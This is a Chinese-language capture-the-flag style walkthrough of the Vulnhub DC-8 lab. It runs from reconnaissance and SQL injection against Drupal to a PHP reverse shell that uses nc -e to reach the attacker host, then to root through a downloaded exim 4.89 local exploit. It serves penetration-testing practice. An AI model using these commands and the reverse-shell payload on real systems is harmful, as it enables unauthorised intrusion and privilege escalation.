一、 環境搭建
Vulnhub上下載DC8
把它倒入vm虛擬機
二、 信息收集
虛擬機開kali直接nmap掃一掃本機的網段
發現了兩個主機但是呢已經知道了128是本機ip那就是129了,開啟了80和22端口然后直接去80看看
發現了網頁那就先掏出dirsearch掃目錄,掃出來很多就很舒服了
那就開始吧先挑重要的看,先是翻到了是Drupal cms然后就直接去搜漏洞利用了后面又翻到了一個登錄,還有一個web.config,還有robots.txt寫漏了
這個站看着像是有注入,打了一發單引號就把路徑爆出來了
那好吧那就直接sqlmap梭一把,簡直沒問題
賬號密碼有了剛剛的后台也有了那就沖沖,kali用john解密 Admin沒解出來,john的密碼為turtle,翻到了一個文件上傳只能傳圖片那就先跳過再翻翻,煩得要死
翻到這里有一個寫PHP代碼的直接寫一個反彈shell
<?php system("nc -e /bin/sh 192.168.101.128 1234")?>
順便kali監聽一下端口
使用python得到交互式shell
python -c "import pty;pty.spawn('/bin/bash')"
用find / -user root -perm -4000 -print 2>/dev/null查看使用有利用suid提權的命令發現exim4有root權限這可能是一個突破口(SUID可以讓調用者以文件擁有者的身份運行該文件,所以我們利用SUID提權的思路就是運行root用戶所擁有的SUID的文件,那么我們運行該文件的時候就得獲得root用戶的身份了。)
查看版本/usr/sbin/exim4 --version,版本為4.89
那就拿出msf使用searchsploit exim 4,查找到可以利用本地提權的方法
cp /usr/share/exploitdb/exploits/linux/local/46996.sh /home/root.sh,將利用腳本復制出來
把root.sh放/var/www/html下然后讓靶機wget下載
打開root.sh需要使用set ff=unix,使用unix換行符。不然就無法使用腳本
然后把靶機切換到有寫入權限的/tmp目錄中中,使用wget命令下載root.sh提權腳本
然后給執行權限chmod 777 root.sh
./root.sh -m netcat和./root.sh -m setuid這兩種方式看誰可以就誰
這有一個坑就是必須要轉換格式,搞了半天真是服
shell腳本報錯/bin/bash^M: bad interpreter: No such file or directory,通過查閱資料得知,shell腳本格式必須是unix才行
1.sed -i "s/\r//" filename 或sed -i "s/^M//" filename,直接將回車符替換為空字符串。
2.vim filename,編輯文件,執行“: set ff=unix”,將文件設置為unix格式,然后執行“:wq”,保存退出。
3.dos2unix filename或busybox dos2unix filename,如果提示command not found,可以使用前兩種方法。
拿下了,中途各種問題沒有這么順利